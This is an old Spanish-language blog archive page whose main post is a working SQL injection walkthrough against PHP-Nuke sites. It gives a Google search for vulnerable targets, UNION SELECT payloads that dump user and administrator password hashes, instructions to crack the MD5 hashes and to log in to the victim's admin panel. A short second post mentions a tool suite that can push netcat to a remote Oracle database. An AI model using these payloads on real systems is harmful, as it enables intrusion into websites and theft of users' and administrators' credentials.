Skip navigation

Monthly Archives: septiembre 2007

Se trata de realizar una inyección de código en servidores con PHP-Nuke para obtener el hash de contraseñas de usuario y si tenemos suerte del administrador del site.

Realizariamos una búsqueda en Google con la siguiente sentencia: allinurl:modules.php?name=Search

y en la búsqueda, bien pasando los parámetros directamente en la URL o bien desde el propio buscador ejecutaríamos

s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*

O podríamos probar con

modules.php?name=Search&type=comments&%20%20%20query=&%20%20%
20query=
loquesea&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors

Y la sentencia quedaría así:

http://www.victima.com/modules.php?name=Search&type=comments&%20%20%20query=&%20%20%20query=loquesea&
instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors

con lo que obtendríamos el HASH seguido del usuario que ha publicado de la siguiente forma:

e141f494f13327099c5c6f9bd469a2f6
Enviado por webmaster el Wednesday, 31 December a las 15:59:59
Adjuntar al Artículo:
(0 responde)

Si tenemos la suerte de encontrar el hash enviado por webmaster tenemos más probabilidades de que el password coincida con el de administrador.

Todos los HASH que encontramos estarán encriptados con el algoritmo md5, con un MD5 Crack, webs con crackeador online o tablas Rainbow podremos desencriptarlo fácilmente.

Para entrar a la web de administración generalmente nos encontraremos con la siguiente URL:

http://www.victima.com/admin.php

Introducimos el usuario y contraseña obtenidos del nombre de usuario de publicación y el HASH desencriptado en MD5

User : webmaster
Pass : password

Anuncios

OAT es una suite de herramientas que pueden ser utilizadas para enumerar cuentas Oracle por defecto, hacer peticiones o abrir un prompt de SQL, incluso configurar una sesion de TFTP para transferir un netcat a una BBDD remota.


Oracle Auditing Tools

Extraído de vulnerabilityassessment.co.uk